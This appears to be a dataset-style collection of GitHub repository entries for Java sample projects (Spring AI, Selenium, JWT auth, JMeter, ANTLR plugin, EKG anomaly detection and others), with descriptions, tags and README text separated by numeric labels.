[embedding-models-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/04-embedding-models/embedding-models-openai) | Vector transformation (embeddings) with LLMs via OpenAI. | ### 5. 
Document Readers | Project | Description | |---------|---------| | [document-readers-json-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/05-document-readers/document-readers-json-ollama) | Reading and vectorizing JSON documents with LLMs via Ollama. | | [document-readers-pdf-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/05-document-readers/document-readers-pdf-ollama) | Reading and vectorizing PDF documents with LLMs via Ollama. | | [document-readers-text-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/05-document-readers/document-readers-text-ollama) | Reading and vectorizing text documents with LLMs via Ollama. | ### 6. Document Transformers | Project | Description | |---------|---------| | [document-transformers-metadata-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/06-document-transformers/document-transformers-metadata-ollama) | Enrich documents with keywords and summary metadata for enhanced retrieval via Ollama. | | [document-transformers-splitters-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/06-document-transformers/document-transformers-splitters-ollama) | Divide documents into chunks to fit the LLM context window via Ollama. | ### 7. Document Writers _Coming soon_ ### 8. Vector Stores _Coming soon_ ### 9. Tools _Coming soon_ ### 10.
Image Models _Coming soon_ ## References and Additional Resources * [Spring AI](https://docs.spring.io/spring-ai/reference/index.html) * [Spring AI Azure Workshop](https://github.com/Azure-Samples/spring-ai-azure-workshop)
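The `prompts-templates-*` modules listed above are built around prompt templates: prompt strings with named placeholders that are filled in just before the call to the model. As a rough plain-Java illustration of that idea (this is not the Spring AI `PromptTemplate` API; the class and method names below are invented for the sketch):

```java
import java.util.Map;

// Plain-Java sketch of the prompt-template idea: named placeholders in a
// prompt string are replaced with user-supplied values before the prompt
// is sent to a chat model. Illustrative only; all names are made up.
public class PromptTemplateDemo {

    public static String render(String template, Map<String, String> vars) {
        String result = template;
        for (Map.Entry<String, String> e : vars.entrySet()) {
            result = result.replace("{" + e.getKey() + "}", e.getValue());
        }
        return result;
    }

    public static void main(String[] args) {
        String template = "Tell me a joke about {topic} in the style of {style}.";
        System.out.println(render(template, Map.of("topic", "cows", "style", "a pirate")));
        // Prints: Tell me a joke about cows in the style of a pirate.
    }
}
```

In the actual samples, the rendered string becomes the prompt handed to the Ollama or OpenAI chat model.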
0
yfain/Java4Kids_code
The sources of code sample for the Java For Kids book
null
null
1
afester/FranzXaver
JavaFX components, tools, and sample applications
null
null
1
nadvolod/selenium-java
This is the sample repository that we use in the Complete Selenium WebDriver with Java Bootcamp
java selenium test-automation
![Java CI with Maven](https://github.com/nadvolod/selenium-java/workflows/Java%20CI%20with%20Maven/badge.svg) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/95a6a0b3fe3f418fb7ff035fac5d2f87)](https://app.codacy.com/manual/nadvolod/selenium-java?utm_source=github.com&utm_medium=referral&utm_content=nadvolod/selenium-java&utm_campaign=Badge_Grade_Dashboard) The Java Software Engineer in Test (SDET) curriculum is your ticket to a wonderful test automation career. 🌎 5 months of world-class training 💻 Gain real-world experience through automation with real customers 🚀 Build out your open source coding skills through group projects 💼 Interview training, on-the-job guidance, and live support to ensure your success in your new role. 📅 100% virtual education Join the ranks of the world's elite software developers and test automation experts 🌟 👉 Join now, be the first to know about the launch and enjoy exclusive benefits: https://ultimateqa.ck.page/academy-coming-soon # The Bootcamp that Will Make You an Expert in 💪 Mastering automation testing from A to Z—be the go-to person to improve software quality 🚀 Unleashing the potential of using Selenium WebDriver for automation 🧠 Mastering Java for Software Automation Engineers—the way to definitely go pro 🏆 Implementing automation best practices established over decades—as the top professionals do 👍 Using ATDA—a secret automation technique to create top-quality tests 🦸‍♀️️Creating a test automation framework in less than 45 minutes ## Some Topics You Will Master ### How to achieve parallelization with JUnit and TestNg [![Parallel Test Execution with JUnit and TestNg](http://img.youtube.com/vi/ufccoaURMIc/0.jpg)](https://youtu.be/ufccoaURMIc "Parallel Test Execution with JUnit and TestNg") ### How to use the Page Object Model design pattern effectively ### Continuous integration with SauceLabs and GitHub ### Cross Browser and Cross Platform Automation using SauceLabs ### How to get awesome reports using the TestProject
SDK ``` FIRST 150 PEOPLE GET 15% DISCOUNT! USE COUPON CODE github-15 AT CHECKOUT ``` [Complete Selenium WebDriver with Java Bootcamp](https://ultimateqa.com/selenium-webdriver-java-course/)
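The Page Object Model mentioned above can be illustrated without a real browser. The sketch below is illustrative only: `FakeBrowser` is a hypothetical stand-in for Selenium's `WebDriver`, and every name in it is invented. The point of the pattern is that tests call intent-level page methods instead of scattering raw locators through the test code.

```java
import java.util.HashMap;
import java.util.Map;

// Sketch of the Page Object Model: test code talks to a page class,
// not to raw element locators. FakeBrowser stands in for a real
// Selenium WebDriver; all names here are hypothetical.
public class PageObjectDemo {

    // Minimal stand-in for a browser/driver.
    static class FakeBrowser {
        final Map<String, String> fields = new HashMap<>();
        void type(String locator, String text) { fields.put(locator, text); }
        String read(String locator) { return fields.getOrDefault(locator, ""); }
    }

    // The page object: it encapsulates the locators and exposes
    // intent-level methods that return the page for fluent chaining.
    static class LoginPage {
        private final FakeBrowser browser;
        LoginPage(FakeBrowser browser) { this.browser = browser; }
        LoginPage enterUsername(String name) { browser.type("#username", name); return this; }
        LoginPage enterPassword(String pw)   { browser.type("#password", pw);   return this; }
        String typedUsername() { return browser.read("#username"); }
    }

    public static void main(String[] args) {
        FakeBrowser browser = new FakeBrowser();
        LoginPage page = new LoginPage(browser).enterUsername("alice").enterPassword("secret");
        System.out.println(page.typedUsername()); // prints "alice"
    }
}
```

If a locator changes, only the page class is updated; the tests that use it stay untouched, which is the main maintenance win of the pattern.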
1
playgameservices/8bitartist
8 Bit Artist sample featuring Real-Time Multiplayer and Nearby Connections
null
# 8 Bit Artist 8 Bit Artist is a fully-featured multiplayer game demonstrating the [Real-time Multiplayer](https://developers.google.com/games/services/android/realtimeMultiplayer) and [Nearby Connections](https://developers.google.com/games/services/android/nearby) APIs. <img src="screenshot.png" width="600" title="8 Bit Artist Screenshot"></img> ## Game Summary 8 Bit Artist is a multiplayer drawing game where the artist has very limited resources: 4 colors and a 10x10 pixel canvas. The artist is given a word which he/she attempts to draw. It is the job of the other player(s) to guess what is being drawn as fast as possible. Points are awarded for guessing quickly, and players take turns drawing. There are two multiplayer game modes, each with the same gameplay but leveraging a different API: ### Real-time Multiplayer Mode ("Online" Mode) 8 Bit Artist can be played with 2-4 players anywhere in the world using the Play Game Services Real-time Multiplayer API. After signing in with your Google account, press the **Play Online** button to begin matchmaking. You can select people you know, or use automatching to find random players that are online. In this mode players can leave the game at any time but you cannot join or re-join a game that is already in progress. This mode also uses the [Achievements](https://developers.google.com/games/services/android/achievements) API, which rewards players for achieving certain in-game milestones. > **Warning:** Real-time and turn-based multiplayer services are deprecated as of September 16th, 2019. These services are unavailable for new games. For more information, see [Ending support for multiplayer APIs in Play Games Services](https://support.google.com/googleplay/android-developer/answer/9469745). ### Nearby Connections Mode ("Party" Mode) In party mode, you can play 8 Bit Artist against 2+ people with devices connected to the same WiFi network.
In this mode there is no need to sign in with Google and there is no server involved. Instead, the devices connect directly over WiFi and send messages to each other over the local network. In this mode the game has a "hop-in, hop-out" experience. One player is the game "host" and initiates the game with the **Host Party** button. All other players can join the game with the **Join Party** button. Non-host players can join and leave the game at any time, as long as the host does not end the game their scores are remembered even after a disconnection. There is also no theoretical limit to how many players can join in Nearby Mode, however the UI may not support displaying individual scores for very large numbers of players. ## Set Up The following steps will show you how to import, build, and run this sample app. These instructions assume you want to enable all features of the sample application. If you are only interested in Nearby Connections and not interested in Sign-in with Google, Real-time Multiplayer, or Achievements, you can skip directly to Step #2 (Android Studio). ### 1 - The Developer Console First, set up a project and link your app in the Developer Console. For more information, visit: [https://developers.google.com/games/services/console/enabling](https://developers.google.com/games/services/console/enabling) Make sure to take note of the **Package Name** and **App ID** from this step. Second, create the following five achievements in the Developer Console: | Name | Incremental? | # of Steps | |-------------------|--------------|------------| | 5 Turns | Yes | 5 | | 10 Turns | Yes | 10 | | Started a Game | No | N/A | | Guessed Correctly | No | N/A | | Got One Wrong | No | N/A | Make sure to record the **Achievement ID** for each created achievement, you will need them in later steps. ### 2 - Android Studio #### Import the Project Open Android Studio and click **File > Import Project**. 
Select the directory where you cloned the code from this repository. #### Modify Ids First, open `AndroidManifest.xml` and change the application package name to the package name you used in the Developer Console. Next, if you completed Step 1 and enabled Play Game Services for this sample, open `res/values/ids.xml` and replace each instance of `REPLACE_ME` with the appropriate value. For `app_id` this is your game's app ID from the Developer Console, and for each of the `achievement_*` values it is the ID of the achievement you created with the matching name. ## Run Build and run the game. You will need to run the game on a physical Android device with Google Play Services installed. It is recommended to build and run the game from Android Studio, however you can also build manually by running `./gradlew build` in the project directory and then installing the resulting application with `adb install <APK_LOCATION>`. ### Troubleshooting * To use Party Mode, your devices must be on the same WiFi network and the network must have [multicast](http://en.wikipedia.org/wiki/Multicast_DNS) enabled. * Make sure to sign your apk with the same certificate as the one whose fingerprint you configured on Developer Console, otherwise you will see errors. * If you are testing an unpublished game, make sure that the account you intend to sign in with (the account on the test device) is listed as a tester in the project on your Developer Console setup (check the list in the "Testing" section), otherwise the server will act as though your project did not exist and return errors.
1
kasecato/vscode-javadebug-sample
Java Debugging sample in Visual Studio Code
null
# Java Debugging in Visual Studio Code - [Maven + Jetty version](https://github.com/kasecato/vscode-javadebug-sample/tree/maven-jetty) ## Getting Started ### Install Extension * Microsoft, Java Extension Pack, https://marketplace.visualstudio.com/items?itemName=vscjava.vscode-java-pack ### Setting the JDK * Temurin, https://adoptium.net/ * Amazon, Corretto 17, https://docs.aws.amazon.com/corretto/latest/corretto-17-ug/downloads-list.html * Azul Systems, Zulu OpenJDK, https://www.azul.com/downloads/ * OpenJDK, https://jdk.java.net/ * Red Hat, OpenJDK, https://developers.redhat.com/products/openjdk/download/ The path to the Java Development Kit is searched in the following order: * the `java.home` setting in VS Code settings (workspace then user settings) * the `JDK_HOME` environment variable * the `JAVA_HOME` environment variable * on the current system path ### Gradle Configurations * build.gradle ```groovy repositories { mavenCentral() } apply plugin: 'java' sourceCompatibility = 17 targetCompatibility = 17 compileTestJava { options.compilerArgs += '-parameters' } test { useJUnitPlatform() } dependencies { testImplementation('org.junit.jupiter:junit-jupiter:5.9.2') } ``` ### Build Configurations * .vscode/tasks.json ```json { "version": "2.0.0", "echoCommand": true, "command": "./gradlew", "presentation": { "echo": true, "reveal": "always", "focus": false, "panel": "shared" }, "tasks": [ { "label": "compileJava", "type": "shell" }, { "label": "test", "type": "shell", "group": { "kind": "test", "isDefault": true } }, { "label": "clean", "type": "shell" }, { "label": "build", "type": "shell", "group": { "kind": "build", "isDefault": true } } ] } ``` ### Java Debugger Configurations * .vscode/launch.json ```json { "version": "0.2.0", "configurations": [ { "type": "java", "name": "Debug (Launch)", "request": "launch", "cwd": "${workspaceFolder}", "console": "internalConsole", "stopOnEntry": false, "preLaunchTask": "compileJava", "mainClass": "com.vscode.demo.Main",
"args": "" } ] } ``` ### Java programming * src/main/java/com/vscode/demo/Main.java ```java package com.vscode.demo; import java.util.Objects; import java.util.stream.Stream; public class Main { public static void main(String[] args) { System.out.println("Hello VS Code!"); Stream.of("React", "Angular", "Vue") .filter(x -> Objects.equals(x, "React")) .forEach(System.out::println); } } ``` * src/main/java/com/vscode/demo/MainTest.java ```java package com.vscode.demo; import java.util.Arrays; import java.util.List; import java.util.Objects; import org.junit.jupiter.api.DisplayName; import org.junit.jupiter.api.Tag; import org.junit.jupiter.api.Test; import static org.junit.jupiter.api.Assertions.assertEquals; @Tag("main") class MainTest { @Test @DisplayName("VS Code JUnit 5 test") void testMain() { // arrange final List<String> list = Arrays.asList("React", "Angular", "Vue"); // act final String actual = list.stream() .filter(x -> Objects.equals(x, "React")) .findFirst() .orElseThrow(IllegalArgumentException::new); // assert assertEquals("React", actual, () -> "Main Succeed"); } } ``` ### Debugging 1. Open `Main.java` 1. Press `F5` ### Testing 1. Open Command Pallete `cmd+shift+p` (macOS) or `ctrl+shift+p` (Windonws/Linux) 1. `Tasks Run Test Task` 1. `test` # References 1. Visual Studio Code, Java in VS Code, https://code.visualstudio.com/docs/languages/java 1. GitHub, Language Support for Java(TM) by Red Hat, https://github.com/redhat-developer/vscode-java 1. Visual Studio Code, Integrate with External Tools via Tasks, Variable substitution, https://code.visualstudio.com/Docs/editor/tasks#_variable-substitution 1. Gradle, Chapter 47. The Java Plugin, https://docs.gradle.org/current/userguide/java_plugin.html 1. GitHub, JUnit 5 Samples, https://github.com/junit-team/junit5-samples 1. Gradle, Gradle 4.6 Release Notes - JUnit 5 support, https://docs.gradle.org/4.6/release-notes.html#junit-5-support
1
BelooS/CircleToRect-ActivityTransition
Sample of how to perform circle to rect activity transition
null
null
1
SpringCloud/sample-zuul-swagger2
:palm_tree: A sample for zuul-swagger2 to test original services
null
![image](https://img.shields.io/badge/test-passing-green.svg) # sample-zuul-swagger2 :palm_tree: A sample for zuul-swagger2 to test original services sample-zuul-swagger2 is a project that integrates Swagger2 into Zuul to dynamically generate a testing dashboard for the routed source services. ``` @Configuration @EnableSwagger2 public class SwaggerConfig { // Use the injected Zuul configuration to enable testing of the routed source services' APIs @Autowired ZuulProperties properties; @Primary @Bean public SwaggerResourcesProvider swaggerResourcesProvider() { return () -> { List<SwaggerResource> resources = new ArrayList<>(); properties.getRoutes().values().stream() .forEach(route -> resources .add(createResource(route.getServiceId(), route.getServiceId(), "2.0"))); return resources; }; } private SwaggerResource createResource(String name, String location, String version) { SwaggerResource swaggerResource = new SwaggerResource(); swaggerResource.setName(name); swaggerResource.setLocation("/" + location + "/v2/api-docs"); swaggerResource.setSwaggerVersion(version); return swaggerResource; } } ``` ![image](https://github.com/SpringCloud/sample-zuul-swagger2/blob/master/img/1.png) ![image](https://github.com/SpringCloud/sample-zuul-swagger2/blob/master/img/2.png)
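For context, the `SwaggerConfig` above builds one `SwaggerResource` per route found in the injected `ZuulProperties`. A hypothetical `application.yml` it could iterate over might look like the following (the service names are examples only, not part of this repository):

```yaml
zuul:
  routes:
    user-service:
      path: /user-service/**
      serviceId: user-service
    order-service:
      path: /order-service/**
      serviceId: order-service
```

With this configuration, the Swagger dashboard would list `user-service` and `order-service`, each resource pointing at `/<serviceId>/v2/api-docs`.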
1
anthonygauthier/jmeter-elasticsearch-backend-listener
JMeter plugin that lets you send sample results to an ElasticSearch engine to enable live monitoring of load tests.
backend backend-listener cd ci continous-delivery continuous-integration elasticsearch elasticsearch-engine grafana java jmeter jmeter-plugin jmeter-plugins kibana listener performance performance-analysis performance-testing plugin reporting
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/8a2f2a06171248acb6411a2d870558c8)](https://app.codacy.com/app/antho325/jmeter-elasticsearch-backend-listener?utm_source=github.com&utm_medium=referral&utm_content=delirius325/jmeter-elasticsearch-backend-listener&utm_campaign=Badge_Grade_Dashboard) [![Build Status](https://travis-ci.org/delirius325/jmeter-elasticsearch-backend-listener.svg?branch=master)](https://travis-ci.org/delirius325/jmeter-elasticsearch-backend-listener) # Overview ### Description JMeter ElasticSearch Backend Listener is a JMeter plugin enabling you to send test results to an ElasticSearch engine. It is meant as an alternative live-monitoring tool to the built-in "InfluxDB" backend listener of JMeter. ### Features * ElasticSearch low-level REST client * Using the low-level client makes the plugin compatible with any ElasticSearch version * X-Pack Authentication! * Just supply your credentials in the specified fields! * Bulk requests * By making bulk requests, there are practically no impacts on the performance of the tests themselves. * Filters * Only send the samples you want by using Filters! Simply type them as follows in the field ``es.sample.filter``: ``filter1;filter2;filter3`` or ``sampleLabel_must_contain_this``. * You can also choose to exclude certain samplers; `!!exclude_this;filter1;filter2` * Specific fields ``field1;field2;field3`` * Specify fields that you want to send to ElasticSearch (possible fields below) * AllThreads * BodySize * Bytes * SentBytes * ConnectTime * ContentType * DataType * ErrorCount * GrpThreads * IdleTime * Latency * ResponseTime * SampleCount * SampleLabel * ThreadName * URL * ResponseCode * TestStartTime * SampleStartTime * SampleEndTime * Timestamp * InjectorHostname * ElapsedDuration * Verbose, semi-verbose, error only, and quiet mode * __debug__ : Send request/response information of all samplers (headers, body, etc.)
* __info__ : Sends all samplers to the ElasticSearch engine, but only sends the headers, body info for the failed samplers. * __quiet__ : Only sends the response time, bytes, and other metrics * __error__ : Only sends the failing samplers to the ElasticSearch engine (Along with their headers and body information). * Use either Kibana or Grafana to visualize your results! * [Click here to get a sample Grafana dashboard!](https://github.com/delirius325/jmeter-elasticsearch-backend-listener/wiki/JMeter-Generic-Dashboard) - All you need to do is import it into Grafana and change the data source! * Continuous Integration support - [Build comparison!](https://github.com/delirius325/jmeter-elasticsearch-backend-listener/wiki/Continuous-Integration---Build-Comparison) * Send JMeter variables to ElasticSearch! [Refer to this for more info!](https://github.com/delirius325/jmeter-elasticsearch-backend-listener/wiki/Sending-JMeter-variables) * New AWS ES parameters introduced in version 2.6.0, which leverage role-based authentication to access Elasticsearch managed hosting on AWS * If your ES cluster is using a self-signed certificate, you can set `es.ssl.verificationMode` to `none` to skip the hostname verification and cluster certificate validation. ### Maven ```xml <dependency> <groupId>io.github.delirius325</groupId> <artifactId>jmeter.backendlistener.elasticsearch</artifactId> <version>2.6.10-SNAPSHOT</version> </dependency> ``` ## Contributing Feel free to contribute by branching and making pull requests, or simply by suggesting ideas through the "Issues" tab. ### Packaging and testing your newly added code Execute the Maven command below. Make sure JAVA_HOME is set properly. ``` mvn package ``` Move the resulting JAR to your `JMETER_HOME/lib/ext`.
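As a rough illustration of the `es.sample.filter` semantics documented under Features (`filter1;filter2;filter3` to include, a leading `!!` to exclude), the matching logic could be sketched like this in plain Java. This is an illustrative re-implementation of the documented behaviour, not the plugin's actual code, and it assumes the `!!` prefix turns the whole list into an exclusion list:

```java
import java.util.Arrays;
import java.util.List;

// Illustrative sketch of the documented `es.sample.filter` semantics:
// a sampler is sent if its label contains any listed filter; a leading
// "!!" excludes matching samplers instead. Not the plugin's real code.
public class SampleFilterDemo {

    public static boolean shouldSend(String sampleLabel, String filterProperty) {
        if (filterProperty == null || filterProperty.isEmpty()) {
            return true; // no filter configured: send everything
        }
        boolean exclude = filterProperty.startsWith("!!");
        String raw = exclude ? filterProperty.substring(2) : filterProperty;
        List<String> filters = Arrays.asList(raw.split(";"));
        boolean matches = filters.stream().anyMatch(sampleLabel::contains);
        return exclude ? !matches : matches;
    }

    public static void main(String[] args) {
        System.out.println(shouldSend("login request", "login;checkout")); // true
        System.out.println(shouldSend("health check", "!!health;debug"));  // false
    }
}
```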
## Screenshots ### Configuration ![screnshot1](https://cdn-images-1.medium.com/max/2000/1*iVb7mIp2dPg7zE4Ph3PrGQ.png "Screenshot of configuration") ### Sample Grafana dashboard ![screnshot1](https://image.ibb.co/jW6LNx/Screen_Shot_2018_03_21_at_10_21_18_AM.png "Sample Grafana Dashboard") ### For more info For more information, here's a little [documentation](https://github.com/delirius325/jmeter-elasticsearch-backend-listener/wiki).
1
afsaredrisy/MediapipeHandtracking_GPU_Bitmap_Input
Handtracking mediapipe sample with bitmap RGB input
handtracking handtracking-bitmap mediapipe mediapipe-bitmap mediapipe-custom-input
# MediapipeHandtracking_GPU_Bitmap_Input Handtracking mediapipe sample with bitmap RGB input ## Demo Input Bitmap <br/> ![input_bitmap](handtrackinggpu/res/drawable/img2.jpg) **Output**<br/> ![output_image](Screenshot_20191231_164913_com.google.mediapipe.apps.handtrackinggpu.jpg)
1
AndroidDeveloperLB/ThreePhasesBottomSheet
A bottom sheet sample that's similar to how Google Maps treat it
null
# ThreePhasesBottomSheet A bottom sheet sample that's similar to how Google Maps treat it. Example animation: ![enter image description here](https://raw.githubusercontent.com/AndroidDeveloperLB/ThreePhasesBottomSheet/master/device-2016-01-16-175728.gif) This is based mainly on these 2 repositories: - https://github.com/Flipboard/bottomsheet - https://github.com/chrisbanes/cheesesquare and was asked about on StackOverflow here: http://stackoverflow.com/q/34160423/878126 It might be possible to use this repository instead of the bottomSheet repo: https://github.com/umano/AndroidSlidingUpPanel Known issues: -- First method, of using AppBarLayout, CoordinatorLayout, etc.: - Tested on versions 6, 4.2 and 4.4. Not sure about the others. - Doesn't handle orientation changes well. Handled in the sample by re-showing the bottom sheet, but it doesn't restore its state. - Rare issue of being able to scroll inside the bottom sheet's content while it's still collapsed (at the bottom). Not sure if it still exists. - Can have weird issues (like showing in full-screen) in case the keyboard was shown before peeking. This is handled in the sample by just hiding the bottom sheet when the keyboard appears. - Can't handle situations where the bottom sheet is larger in its peeked state than in its expanded state. - When you press the back button to go from a scrolled, expanded bottom sheet state to the peek state, it has some weird issues. Need to handle this, or make it work differently. In the sample, I chose to just dismiss the bottom sheet for this case. Second method, of using just a NestedScrollView: - Doesn't snap for scrolling of the bottom sheet when it's in expanded mode. Not an issue, just a missing feature. - Pressing the back button when the bottom sheet is expanded can cause weird UI issues. - Might have other issues.
1
Nasruddin/spring-boot-3-jwt-auth
:key: Sample Spring boot application secured using JWT auth in custom header(X-Auth-Token).
authentication authorization custom-jwt custom-jwt-auth jwt jwt-tokens openapi3 spring-boot spring-boot-3 spring-security spring-security-jwt swagger-documentation swagger-ui
# spring-boot-3-jwt-auth :key: Sample Spring boot 3 application for Authentication and Authorization ## Features * Customizable header(X-Auth-Token) to pass Auth token. * JWT for token creation and validation. * Role based authorization. * Device based auth. * Custom Validators * Spring doc. ## Running the sample app ``` mvn spring-boot:run ``` ## Registering a User ``` curl -X POST "http://localhost:9000/api/auth/register" -H "accept: */*" -H "Content-Type: application/json" -d "{\"username\":\"nasruddin\",\"password\":\"p@ssw00d\",\"device\":\"web\",\"email\":\"nasruddin@gmail.com\"}" ``` ``` { "id":2, "username":"nasruddin", "password":"$2a$10$U3CR4T1Gowd50Q.0yK/UuOh.XWVx0BYIe7BiAmymXZ.MYPUtU5F.e", "email":"nasruddin@gmail.com", "lastPasswordReset":"2023-09-14T08:41:10.080+00:00", "authorities":"ADMIN" } ``` H2-console can be accessed at <http://localhost:9000/api/h2-console> ![JWT Decoded](https://github.com/Nasruddin/spring-boot-jwt-auth/blob/pom-update/images/h2-console.png?raw=true) ## Login a User / Fetch Token ``` curl -X POST "http://localhost:9000/api/auth" -H "accept: */*" -H "Content-Type: application/json" -d "{\"username\":\"nasruddin\",\"password\":\"p@ssw00d\",\"device\":\"web\"}" ``` ``` {"token":"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJuYXNydWRkaW4iLCJhdWRpZW5jZSI6IndlYiIsImNyZWF0ZWQiOjE2OTQ2ODE2ODE3MDUsImV4cCI6MTY5NTI4NjQ4MX0.MydwIWzN3SgCvB8cYozKcR2tHMCM5nrIPXUBtx4o82ot1taL_NQM5TRHZ4yOc9uUcZFrz1XQAL_fDNXAIwmZxw"} ``` ![JWT Decoded](https://github.com/Nasruddin/spring-boot-3-jwt-auth/blob/master/images/decoded-jwt.png?raw=true) ## Accessing User/Protected API Without setting X-AUTH-TOKEN ``` curl -X GET "http://localhost:9000/api/user/nasruddin" -H "accept: */*" ``` ``` { "timestamp":"2023-09-14T08:57:08.403+00:00", "status":401, "error":"Unauthorized", "path":"/api/user/nasruddin" } ``` With setting X-AUTH-TOKEN ``` curl -X GET "http://localhost:9000/api/users/nasruddin" -H "accept: */*" -H "X-Auth-Token: 
eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJuYXNydWRkaW4iLCJhdWRpZW5jZSI6IndlYiIsImNyZWF0ZWQiOjE2OTQ2ODE2ODE3MDUsImV4cCI6MTY5NTI4NjQ4MX0.MydwIWzN3SgCvB8cYozKcR2tHMCM5nrIPXUBtx4o82ot1taL_NQM5TRHZ4yOc9uUcZFrz1XQAL_fDNXAIwmZxw" ``` ``` { "id":1, "username":"nasruddin", "password":"$2a$10$dq6uFlehtetsfI6glLkA.OaeoIEu5PPqIVNZHDMCCiEej8b/0vhWa","email":"nasruddin@gmail.com", "lastPasswordReset":"2023-09-14T08:42:37.758+00:00", "authorities":"ADMIN" } ``` ## Admin API ``` curl -X GET "http://localhost:9000/api/admin" -H "accept: */*" -H "X-Auth-Token: eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJuYXNydWRkaW4iLCJhdWRpZW5jZSI6IndlYiIsImNyZWF0ZWQiOjE2OTQ2ODE2ODE3MDUsImV4cCI6MTY5NTI4NjQ4MX0.MydwIWzN3SgCvB8cYozKcR2tHMCM5nrIPXUBtx4o82ot1taL_NQM5TRHZ4yOc9uUcZFrz1XQAL_fDNXAIwmZxw" ``` ``` :O ``` ## OpenAPI Swagger 1. Swagger can be accessed at <http://localhost:9000/api/swagger-ui/index.html> ![Swagger](https://github.com/Nasruddin/spring-boot-jwt-auth/blob/pom-update/images/swagger.png?raw=true) 2. API Docs can be accessed at <http://localhost:9000/api/api-docs> ![API Docs](https://github.com/Nasruddin/spring-boot-jwt-auth/blob/pom-update/images/open-api.png?raw=true)
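For illustration, a token with the same three-part HS512 shape as the one above can be produced with plain `javax.crypto` (no Spring or JWT library required). The header/claims JSON and the secret below are made-up examples, not this app's actual configuration:

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Sketch of JWT construction: base64url(header).base64url(claims).base64url(HMAC-SHA512 signature).
public class JwtSketch {
    static String sign(String headerJson, String claimsJson, byte[] secret) throws Exception {
        Base64.Encoder enc = Base64.getUrlEncoder().withoutPadding();
        // The signing input is the encoded header and claims joined by a dot
        String signingInput = enc.encodeToString(headerJson.getBytes(StandardCharsets.UTF_8))
                + "." + enc.encodeToString(claimsJson.getBytes(StandardCharsets.UTF_8));
        Mac mac = Mac.getInstance("HmacSHA512");
        mac.init(new SecretKeySpec(secret, "HmacSHA512"));
        byte[] sig = mac.doFinal(signingInput.getBytes(StandardCharsets.UTF_8));
        return signingInput + "." + enc.encodeToString(sig);
    }
}
```

Verifying a token is the mirror image: recompute the HMAC over the first two segments and compare it with the third.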
1
snicoll/cfp-example
Sample app for the "10 ways to get super-productive with Spring Boot" talk
null
null
1
antlr/jetbrains-plugin-sample
A sample plugin for jetbrains IDEs that uses an ANTLR grammar for a nontrivial custom language.
null
# Sample IntelliJ plugin using ANTLR grammar This is a demonstration of [ANTLRv4 library for IntelliJ plugins](https://github.com/antlr/antlr4-intellij-adaptor/), which makes it easy to create plugins for IntelliJ-based IDEs based on an ANTLRv4 grammar. <img src=screenshot.png> ## Running the plugin for the first time Make sure the Gradle plugin is installed in your IDE, go to `File -> Open`, select the `build.gradle` file and choose `Open as Project`. If you already imported the project when it was not based on Gradle, then choose the option to delete the existing project and reimport it. Once the IDE is done downloading dependencies and refreshing the project, you can use the `Gradle` tool window and use the following `Tasks`: * `build > assemble` to build the project * `intellij > runIde` to run the plugin in a sandboxed instance ## Noteworthy things ### Gradle build The build is based on Gradle, and uses the [gradle-intellij-plugin](https://github.com/JetBrains/gradle-intellij-plugin), which makes it easy to: * pull dependencies, especially the IntelliJ SDK and `antlr4-intellij-adaptor` * build and run tests in a CI environment on different versions of the SDK * generate lexers & parsers from your grammars, thanks to the [ANTLR plugin for Gradle](https://docs.gradle.org/current/userguide/antlr_plugin.html) * publish plugins to the [JetBrains Plugins Repository](https://plugins.jetbrains.com/) * configure the project for occasional contributors 🙂 ### ANTLRPsiNode PSI nodes defined in the plugin extend `ANTLRPsiNode` and `IdentifierDefSubtree`, which automatically makes them `PsiNameIdentifierOwner`s. ### Error highlighting Errors are shown by `SampleExternalAnnotator`, which makes use of `org.antlr.intellij.adaptor.xpath.XPath` to detect references to unknown functions. 
### ParserDefinition `SampleParserDefinition` uses several handy classes from the adaptor library: * `PSIElementTypeFactory` to generate `IElementType`s from tokens and rules defined in your ANTLRv4 grammar * `ANTLRLexerAdaptor` to bind generated lexers to a `com.intellij.lexer.Lexer` * `ANTLRParserAdaptor` to bind generated parsers to a `com.intellij.lang.PsiParser` ## Misc **WARNING**. Turn on Dragon speech recognition for Mac and do a rename. GUI deadlocks. Every time. Turn off dragon. No problem ever. See [JetBrains forum](https://devnet.jetbrains.com/message/5566967#5566967).
1
tdunning/anomaly-detection
A simple demonstration of sub-sequence sampling as used for anomaly detection with EKG signals
null
### Anomaly Detection using Sub-sequence Clustering This project provides a demonstration of a simple time-series anomaly detector. The idea is to use sub-sequence clustering of an EKG signal to reconstruct the EKG. The difference between the original and the reconstruction can be used as a measure of how much the signal is like a prototypical EKG. Poor reconstruction can thus be used to find anomalies in the original signal. The data for this demo are taken from physionet. See http://physionet.org/physiobank/database/#ecg-databases The particular data used for this demo is the Apnea ECG database which can be found at http://physionet.org/physiobank/database/apnea-ecg/ All necessary data for this demo is included as a resource in the source code (see src/main/resources/a02.dat). You can find the original version of the training data at http://physionet.org/physiobank/database/apnea-ecg/a02.dat This file is 6.1MB in size and contains several hours of recorded EKG data from a patient in a sleep apnea study. This file contains 3.2 million samples of which we use the first 200,000 for training. ### Installing and Running the Demo The class com.tdunning.sparse.Learn goes through the steps required to read and process this data to produce a simple anomaly detector. The output of this program consists of the clustering itself (in dict.tsv) as well as a reconstruction of the test signal (in trace.tsv). These outputs can be visualized using the provided R script. To compile and run the demo, mvn -q exec:java -Dexec.mainClass=com.tdunning.sparse.Learn To produce the figures showing how the anomalies are detected rm *.pdf ; Rscript figures.r ### What the Figures Show Figure 1 shows how an ordinary, non-anomalous signal (top line) is reconstructed (middle line) with relatively small errors. Figures 2, 3 and 4 show magnified views of the successive 5 second periods. 
